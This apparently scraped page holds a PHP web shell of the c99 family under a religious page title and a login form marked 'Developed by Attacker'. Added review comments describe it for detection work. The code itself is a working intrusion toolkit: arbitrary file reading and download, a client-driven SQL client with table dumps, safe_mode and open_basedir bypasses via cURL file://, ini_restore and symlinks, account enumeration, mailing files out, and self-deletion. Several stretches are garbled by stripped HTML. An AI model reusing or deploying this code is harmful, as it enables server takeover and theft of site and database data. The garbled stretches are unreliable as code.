No Compulsion in Religion
 
';


'.$err.'':''?>
User:
Password:



Developed by Attacker · copyright ©   & 2010
Login As () Logout

$v)  {  $_POST[$k] = stripslashes($v);  } foreach ($_COOKIE as $k=>$v)  {  $_COOKIE[$k] = stripslashes($v);  }  }
/*
 * Review context: the fragment above is the tail of a block that runs
 * stripslashes() over $_POST and $_COOKIE; its opening was lost when the page
 * was extracted (presumably a magic-quotes check -- confirm against a clean copy).
 * The page as a whole is a PHP web shell (file manager, SQL client, command
 * runner; a c99sh_getupdate() call appears further down). Comments added here
 * describe behaviour for triage and detection work only.
 */

/*
 * Optional HTTP Basic gate, active only when $auth == 1. The supplied user name
 * and password are hashed with unsalted md5() and compared against $name and
 * $pass, which are defined outside this view. On mismatch the script sends a
 * 401 with realm "HELLO!" and exits.
 * Analyst note: the realm string and the two stored digests are stable
 * per-sample values and are useful when clustering copies of this file.
 */
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)   {
   header('WWW-Authenticate: Basic realm="HELLO!"');
   header('HTTP/1.0 401 Unauthorized');
   exit("

Access Denied

");
   }}

/*
 * Scratch-directory selection. Unless BOTH cookies are present the script uses
 * './' and an empty selector; otherwise a POSTed 'tempdir' wins over the cookie.
 * NOTE(review): both values come straight from the client with no validation
 * visible here; $tempdir is later prefixed to fixed file names that the script
 * deletes, so it identifies where dropped helper files should be looked for.
 */
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '';}else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir'];}
$head = '';

/**
 * Minimal in-memory ZIP writer (single-pass, deflate only).
 *
 * Each addFile() call appends one local-file record to $datasec and one
 * central-directory record to $ctrl_dir; file() concatenates both plus the
 * end-of-central-directory record and returns the archive as a string.
 */
class zipfile{
    // Local file header + compressed data, one string per added file.
    var $datasec      = array();
    // Central-directory records, one string per added file.
    var $ctrl_dir     = array();
    // End-of-central-directory signature "PK\x05\x06" followed by four zero bytes.
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    // Byte offset of the next local file header; advanced in addFile().
    var $old_offset   = 0;

    /**
     * Convert a Unix timestamp to a packed 32-bit DOS date/time value.
     *
     * A timestamp of 0 means "now" (getdate() without argument). Years before
     * 1980 are clamped to 1980-01-01 00:00:00.
     * Bit layout, from the shifts below: year-1980 << 25, month << 21,
     * day << 16, hours << 11, minutes << 5, seconds / 2 in the low bits.
     *
     * @param int $unixtime Unix timestamp, or 0 for the current time.
     * @return int Packed DOS date/time.
     */
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }

    /**
     * Add one file to the archive.
     *
     * @param string $data Raw file contents.
     * @param string $name Path stored in the archive; backslashes become '/'.
     * @param int    $time Unix timestamp for the entry, 0 for "now".
     */
    function addFile($data, $name, $time = 0)
    {
        $name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        // Build the text "\xNN\xNN\xNN\xNN" from the hex digits in reversed byte
        // order (little-endian) and let eval() turn it into four raw bytes.
        // The evaluated text comes only from dechex() of an integer, so no
        // request data reaches this eval; it is not a command-execution path.
        // NOTE(review): the indexing assumes dechex() returned 8 digits, which
        // holds only when the top nibble of the DOS time is non-zero. The result
        // is the same four bytes pack('V', <dos time>) would produce.
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');

        // Local file header: signature "PK\x03\x04", three 2-byte fields
        // (0x0014, 0x0000, 0x0008), then the DOS time stamp.
        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";
        $fr   .= "\x00\x00";
        $fr   .= "\x08\x00";
        $fr   .= $hexdtime;
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        // Drop the last 4 bytes and the first 2 bytes of the gzcompress()
        // output so only the inner compressed stream is stored.
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);
        $fr      .= pack('V', $c_len);
        $fr      .= pack('V', $unc_len);
        $fr      .= pack('v', strlen($name));
        $fr      .= pack('v', 0);
        $fr      .= $name;
        $fr .= $zdata;
        $this -> datasec[] = $fr;

        // Central-directory record: signature "PK\x01\x02", the same time stamp,
        // CRC and sizes, then the offset of the matching local header.
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        $cdrec .= pack('V', $this -> old_offset );
        // The next entry's local header starts right after this one.
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }

    /**
     * Return the finished archive as a binary string: all local records, the
     * central directory, then the end record carrying the entry count (twice),
     * the directory size, the directory offset and a zero-length comment field.
     *
     * @return string
     */
    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('V', strlen($ctrldir)) .
            pack('V', strlen($data)) .
            "\x00\x00";
    }
}

/**
 * Compress a download in place and pick the response headers for it.
 *
 * $filename and $filedump are passed by reference and rewritten; the chosen
 * MIME type and (for gzip only) content encoding are written to the globals
 * $mime_type and $content_encoding, which the caller turns into headers.
 * Any unknown $compress value, or a missing extension function, leaves the
 * data untouched and sets 'application/octet-stream'.
 *
 * @param string $filename Download name; gains '.bz2', '.gz' or '.zip'.
 * @param string $filedump File contents; replaced by the compressed form.
 * @param string $compress 'bzip', 'gzip', 'zip', or anything else for none.
 */
function compress(&$filename,&$filedump,$compress) {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
    {
        $filename  .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
    }
    else if ($compress == 'gzip' && @function_exists('gzencode'))
    {
        $filename  .= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
    }
    else if ($compress == 'zip' && @function_exists('gzcompress'))
    {
        $filename .= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        // substr(..., 0, -4) removes the '.zip' appended two lines above, so the
        // entry inside the archive carries the original name.
        $zipfile -> addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile -> file();
    }
    else
    {
        $mime_type = 'application/octet-stream';
    }
}

/**
 * Read a file through whichever read primitive is available.
 *
 * Tries, in order: fopen+fgets, fopen+fread, file(), file_get_contents(),
 * readfile(), highlight_file(), show_source(). Every call is @-silenced.
 * For the last three branches $str receives the function's return value, not
 * the file contents. If nothing is available a message from the $lang table
 * (defined outside this view) is echoed.
 * Analyst note: the function_exists() probing across many equivalent read
 * APIs is presumably there to keep working when some are disabled in php.ini;
 * this kind of fallback ladder is uncommon in ordinary application code.
 *
 * @param string $temp Path to read; callers pass request parameters here.
 * @return mixed File contents on the first four branches, else see above.
 */
function moreread($temp){
    global $lang,$language;
    $str='';
    if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
        if($ffile){
            while(!@feof($ffile)){$str .= @fgets($ffile);};
            fclose($ffile);
        }
    }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
        if($ffile){
            $str = @fread($ffile, @filesize($temp));
            @fclose($ffile);
        }
    }elseif(@function_exists('file')&&($ffiles = @file($temp))){
        foreach ($ffiles as $ffile) { $str .= $ffile; }
    }elseif(@function_exists('file_get_contents')){
        $str = @file_get_contents($temp);
    }elseif(@function_exists('readfile')){
        $str = @readfile($temp);
    }elseif(@function_exists('highlight_file')){
        $str = @highlight_file($temp);
    }elseif(@function_exists('show_source')){
        $str = @show_source($temp);
    }else{echo $lang[$language.'_text56'];}
    return $str;
}

/**
 * Read a file by first copying it through the compress.zlib:// stream wrapper
 * into a temporary file, then reading that copy with moreread().
 *
 * When $temp is empty a temp name is created in the current working directory
 * with the prefix "copytemp"; the temp file is unlinked afterwards either way.
 * NOTE(review): going through a stream wrapper instead of opening the path
 * directly looks like a way around path restrictions on old PHP builds --
 * confirm. Short-lived "copytemp*" files next to the script are a usable
 * file-system indicator.
 *
 * @param string $filename Source path (appended to "compress.zlib://").
 * @param string $temp     Optional temp-file path.
 * @return mixed Whatever moreread() returned, or '' when the copy failed.
 */
function readzlib($filename,$temp=''){
    global $lang,$language;
    $str='';
    if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
    if(@copy("compress.zlib://".$filename, $temp)) {
        $str = moreread($temp);
    } else echo $lang[$language.'_text119'];
    @unlink($temp);
    return $str;
}

/**
 * Write a string to a file through whichever write primitive is available:
 * fopen+fwrite, fopen+fputs, then file_put_contents(). Files are opened "wb",
 * so existing content is replaced.
 *
 * Returns 0 only when the final else is reached; otherwise 1. The writes are
 * @-silenced and their results are not checked, so 1 does not show that any
 * data was written.
 *
 * @param string $temp Destination path.
 * @param string $str  Data to write.
 * @return int 1 or 0 as described above.
 */
function morewrite($temp,$str=''){
    global $lang,$language;
    if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
        if($ffile){
            @fwrite($ffile,$str);
            @fclose($ffile);
        }
    }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
        if($ffile){
            @fputs($ffile,$str);
            @fclose($ffile);
        }
    }elseif(@function_exists('file_put_contents')){
        @file_put_contents($temp,$str);
    }else return 0;
    return 1;
}

/**
 * Send one file by e-mail using mail().
 *
 * The message body argument is empty: the base64-encoded content is appended
 * to the header string after a blank line, so it travels as the message body.
 * $from and the $attach fields are concatenated into the headers without any
 * CR/LF filtering.
 * Analyst note: outbound mail from the web-server account carrying a single
 * base64 part and an empty body argument is worth correlating with access to
 * this script in the web logs.
 *
 * @param string $to     Recipient address.
 * @param string $from   Value for the From header.
 * @param string $subj   Subject line.
 * @param array  $attach Keys read here: 'type', 'name', 'content'.
 * @return int 1 when mail() accepted the message, else 0.
 */
function mailattach($to,$from,$subj,$attach) {
    $headers  = "From: $from\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: ".$attach['type'];
    $headers .= "; name=\"".$attach['name']."\"\r\n";
    $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
    $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
    if(mail($to,$subj,"",$headers)) { return 1; }
    return 0;
}

/**
 * Thin multi-driver SQL client. The driver is chosen by the string in $db
 * ('MySQL', 'MSSQL', 'PostgreSQL', 'Oracle', 'MySQLi', 'mSQL', 'SQLite') and
 * every method switches on it. Elsewhere on the page all connection fields
 * are filled directly from $_POST.
 */
class my_sql {
    // Connection parameters; $base is the database name, $db the driver name.
    var $host = 'localhost';
    var $port = '';
    var $user = '';
    var $pass = '';
    var $base = '';
    var $db   = '';
    // Driver connection handle set by connect().
    var $connection;
    // Result handle of the last query().
    var $res;
    // Last error text set by query().
    var $error;
    // Rows and column names filled by get_result().
    var $rows;
    var $columns;
    var $num_rows;
    var $num_fields;
    // Lines of the SQL dump built by dump().
    var $dump;

    /**
     * Open a connection with the driver named in $this->db.
     *
     * An empty port is replaced by the driver's default (3306 and 1433 in the
     * cases visible here). Returns 0 when the driver's connect function does
     * not exist; returns 1 when the connection succeeds. The method continues
     * on the following source line with the remaining drivers.
     *
     * @return int 1 on success, 0 otherwise.
     */
    function connect()  {
    switch($this->db)     {
   case 'MySQL':
    if(empty($this->port)) { $this->port = '3306'; }
    if(!@function_exists('mysql_connect')) return 0;
    $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
    if(is_resource($this->connection)) return 1;
   break;
   case 'MSSQL':
    if(empty($this->port)) { $this->port = '1433'; }
    if(!@function_exists('mssql_connect')) return 0;
    $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
    if($this->connection) return 1;
   break;
   case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";      if(!@function_exists('pg_connect')) return 0;      $this->connection = @pg_connect($str);      if(is_resource($this->connection)) return 1;   break;   case 'Oracle':      if(!@function_exists('ocilogon')) return 0;      $this->connection = @ocilogon($this->user, $this->pass, $this->base);      if(is_resource($this->connection)) return 1;   break;   case 'MySQLi':    if(empty($this->port)) { $this->port = '3306'; }    if(!@function_exists('mysqli_connect')) return 0;    $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);    if(is_resource($this->connection)) return 1;   break;   case 'mSQL':    if(!@function_exists('msql_connect')) return 0;    $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);    if(is_resource($this->connection)) return 1;   break;   case 'SQLite':    if(!@function_exists('sqlite_open')) return 0;    $this->connection = @sqlite_open($this->base);    if(is_resource($this->connection)) return 1;   break;     }    return 0;     }   function select_db()  {   switch($this->db)    {  case 'MySQL':   if(@mysql_select_db($this->base,$this->connection)) return 1;  break;  case 'MSSQL':   if(@mssql_select_db($this->base,$this->connection)) return 1;  break;  case 'PostgreSQL':     return 1;  break;  case 'Oracle':     return 1;  break;  case 'MySQLi':     return 1;  break;  case 'mSQL':     if(@msql_select_db($this->base,$this->connection)) return 1;  break;  case 'SQLite':     return 1;  break;    } return 0;    }   function query($query)  {    $this->res=$this->error='';   switch($this->db)    {  case 'MySQL':      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))       {       $this->error = @mysql_error($this->connection);      return 0;      }      else 
if(is_resource($this->res)) { return 1; }                        return 2;                                                            break;  case 'MSSQL':     if(false===($this->res=@mssql_query($query,$this->connection)))       {      $this->error = 'Query error';      return 0;      }      else if(@mssql_num_rows($this->res) > 0) { return 1; }     return 2;       break;  case 'PostgreSQL':     if(false===($this->res=@pg_query($this->connection,$query)))      {      $this->error = @pg_last_error($this->connection);      return 0;      }      else if(@pg_num_rows($this->res) > 0) { return 1; }     return 2;   break;  case 'Oracle':     if(false===($this->res=@ociparse($this->connection,$query)))      {      $this->error = 'Query parse error';      }     else       {       if(@ociexecute($this->res))        {       if(@ocirowcount($this->res) != 0) return 2;       return 1;       }      $error = @ocierror();      $this->error=$error['message'];       }  break;  case 'MySQLi':      if(false===($this->res=@mysqli_query($this->connection,$query)))       {       $this->error = @mysqli_error($this->connection);      return 0;      }      else if(is_resource($this->res)) { return 1; }                        return 2;                                                            break;  case 'mSQL':      if(false===($this->res=@msql_query($query,$this->connection)))       {       $this->error = @msql_error($this->connection);      return 0;      }      else if(is_resource($this->res)) { return 1; }                        return 2;                                                            break;  case 'SQLite':      if(false===($this->res=@sqlite_query($this->connection,$query)))       {       $this->error = @sqlite_error_string($this->connection);      return 0;      }      else if(is_resource($this->res)) { return 1; }                        return 2;                                                            break;    }  return 0;  } function get_result()  {    
$this->rows=array();   $this->columns=array();   $this->num_rows=$this->num_fields=0;   switch($this->db)    {  case 'MySQL':   $this->num_rows=@mysql_num_rows($this->res);   $this->num_fields=@mysql_num_fields($this->res);   while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));    @mysql_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'MSSQL':   $this->num_rows=@mssql_num_rows($this->res);   $this->num_fields=@mssql_num_fields($this->res);       while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));   @mssql_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};  break;  case 'PostgreSQL':   $this->num_rows=@pg_num_rows($this->res);    $this->num_fields=@pg_num_fields($this->res);      while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));   @pg_free_result($this->res);   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'Oracle':     $this->num_fields=@ocinumcols($this->res);     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;     @ocifreestatement($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'MySQLi':     $this->num_rows=@mysqli_num_rows($this->res);     $this->num_fields=@mysqli_num_fields($this->res);     while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));      @mysqli_free_result($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'mSQL':     $this->num_rows=@msql_num_rows($this->res);     $this->num_fields=@msql_num_fields($this->res);     while(false !== ($this->rows[] = @msql_fetch_array($this->res)));      @msql_free_result($this->res);     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;  case 'SQLite':     $this->num_rows=@sqlite_num_rows($this->res);     
$this->num_fields=@sqlite_num_fields($this->res);     while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}  break;    }   return 0;   } function dump($table)  {    if(empty($table)) return 0;   $this->dump=array();   $this->dump[0] = '##';   $this->dump[1] = '## --------------------------------------- ';   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");   $this->dump[3] = '## Database: '.$this->base;   $this->dump[4] = '##    Table: '.$table;   $this->dump[5] = '## --------------------------------------- ';   switch($this->db)    {  case 'MySQL':     $this->dump[0] = '## MySQL dump';     if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;     if(!$this->get_result()) return 0;     $this->dump[] = $this->rows[0]['Create Table'];     $this->dump[] = '## --------------------------------------- ';     if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'MSSQL':     $this->dump[0] = '## MSSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'PostgreSQL':     $this->dump[0] = '## PostgreSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}     $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }   break;  case 'Oracle':     $this->dump[0] = '## ORACLE dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {           foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'MySQLi':     $this->dump[0] = '## MySQLi dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {           foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'mSQL':     $this->dump[0] = '## mSQL dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {           foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  case 'SQLite':     $this->dump[0] = '## SQLite dump';     if($this->query('SELECT * FROM '.$table)!=1) return 0;   if(!$this->get_result()) return 0;   for($i=0;$i<$this->num_rows;$i++)    {           foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';    }  break;  default:     return 0;  break;    }   return 1;   } function close()  {    switch($this->db)    {  case 'MySQL':      @mysql_close($this->connection);   break;  case 'MSSQL':     @mssql_close($this->connection);  break;  case 'PostgreSQL':     @pg_close($this->connection);  break;  case 'Oracle':     @oci_close($this->connection);  break;  case 'MySQLi':     @mysqli_close($this->connection);   break;  case 'mSQL':     @msql_close($this->connection);   break;  case 'SQLite':     @sqlite_close($this->connection);   break;    }  } function affected_rows()  {    switch($this->db)    {  case 'MySQL':   return @mysql_affected_rows($this->res);   break;  case 'MSSQL':     return @mssql_affected_rows($this->res);  break;  case 'PostgreSQL':     return @pg_affected_rows($this->res);  break;  case 'Oracle':     return @ocirowcount($this->res);  break;  case 'MySQLi':     return @mysqli_affected_rows($this->res);   break;  case 'mSQL':     return @msql_affected_rows($this->res);   break;  case 'SQLite':     return @sqlite_changes($this->res);  break;  default:     return 0;  break;     break;case 'cURL':   if(empty($_POST['Attacker'])){} else {$curl=$_POST['Attacker'];$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);curl_exec($ch);var_dump(curl_exec($ch));echo "";}break;case 'copy':if(empty($snn)){if(empty($_GET['snn'])){if(empty($_POST['snn'])){} else {$u1p=$_POST['snn'];}} else {$u1p=$_GET['snn'];}}  $u1p=""; // File 
to Include... or use _GET _POST$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$snn, $temp)){$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));fclose($zrodlo);echo "".htmlspecialchars($tekst)."";unlink($temp);echo "";}break;case 'ini_restore': if(empty($_POST['ini_restore'])){} else {$ini=$_POST['ini_restore'];echo ini_get("safe_mode");echo ini_get("open_basedir");require_once("$ini");ini_restore("safe_mode");ini_restore("open_basedir");echo ini_get("safe_mode");echo ini_get("open_basedir");include($_GET["egy"]);echo "";}break;case 'glob':function reg_glob(){$chemin=$_REQUEST['glob'];$files = glob("$chemin*");foreach ($files as $filename) {   echo "$filename\n";}}if(isset($_REQUEST['glob'])){reg_glob();}break;  case 'sym1':     if(empty($_POST['sym1p'])){             } else {$symp=$_POST['sym1p'];         }     if(empty($_POST['sym1p2'])){} else {$symp2=$_POST['sym1p2'];  symlink("a/a/a/a/a/a/", "dummy");symlink("dummy".$symp2."".$symp."", "xxx");unlink("dummy");while (1) {symlink(".", "dummy");  } }  break;  case 'sym2':  @include(xxx);  break;  case 'plugin':  if ($_POST['plugin'] ){                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd                                        $ara = posix_getpwuid($uid);                                                if (!empty($ara)) {                                                  while (list ($key, $val) = each($ara)){                                                    print "$val:";                                                  }                                                  print "\n";                                                }                                        }                                 echo "";              }    }  } } if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) {  if($file=moreread($_POST['d_name'])){ $filedump = $file; }  
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }  if(!empty($_POST['cmd']))    {    @ob_clean();    $filename = @basename($_POST['d_name']);    $content_encoding=$mime_type='';    compress($filename,$filedump,$_POST['compress']);    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }    header("Content-type: ".$mime_type);    header("Content-disposition: attachment; filename=\"".$filename."\";");       echo $filedump;    exit();   } }if(isset($_GET['1'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); }if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db   = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo ''; if(!$sql->connect()) echo "
Can't connect to SQL server
";  else    {   if(!empty($sql->base)&&!$sql->select_db()) echo "
Can't select database
";   else    {    foreach($querys as $num=>$query)      {      if(strlen($query)>5)      {      echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
";      switch($sql->query($query))       {       case '0':       echo "
Error : ".$sql->error."
";       break;       case '1':        if($sql->get_result())        {       echo "";        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);       $keys = @implode(" ";        for($i=0;$i<$sql->num_rows;$i++)         {         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);         $values = @implode(" ';         }        echo "
 ", $sql->columns);        echo "
 ".$keys." 
 ",$sql->rows[$i]);         echo '
 '.$values.' 
";         }       break;       case '2':       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');        echo "
affected rows : ".$ar."

";       break;        }      }     }    }   }    echo "
"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "
"; echo "Base: base."\">
"; echo "


";  echo "
"; echo "
[ BACK ]
"; die(); }if(isset($_GET['12'])) {   @unlink(__FILE__); }if(isset($_GET['11'])) {   @unlink($tempdir.'bdpl');   @unlink($tempdir.'back');   @unlink($tempdir.'bd');   @unlink($tempdir.'bd.c');   @unlink($tempdir.'dp');   @unlink($tempdir.'dpc');   @unlink($tempdir.'dpc.c');   @unlink($tempdir.'prxpl');   @unlink($tempdir.'grep.txt'); }if(isset($_GET['2'])){echo $head;function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); }function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); }if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value)  {  $r .= '';  } echo $r; echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; }echo "
[ BACK ]
";die();}if(isset($_GET['3'])) {   echo $head;   echo '
CPU
';   $cpuf = @file("cpuinfo");   if($cpuf)    {      $c = @sizeof($cpuf);      for($i=0;$i<$c;$i++)        {          $info = @explode(":",$cpuf[$i]);          if($info[1]==""){ $info[1]="---"; }          $r .= '';        }      echo $r;    }   else    {      echo '';    }   echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
';   echo "
[ BACK ]
";   die(); }if(isset($_GET['4'])) {   echo $head;   echo '
MEMORY
';   $memf = @file("meminfo");   if($memf)    {      $c = sizeof($memf);      for($i=0;$i<$c;$i++)        {          $info = explode(":",$memf[$i]);          if($info[1]==""){ $info[1]="---"; }          $r .= '';        }      echo $r;    }   else    {      echo '';    }   echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
';   echo "
[ BACK ]
";   die(); }     if(isset($_GET['tool'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } if(isset($_GET['tools'])) { /*########################################### code 2                  ###########################################*/?>   ";print"
$delmtxt
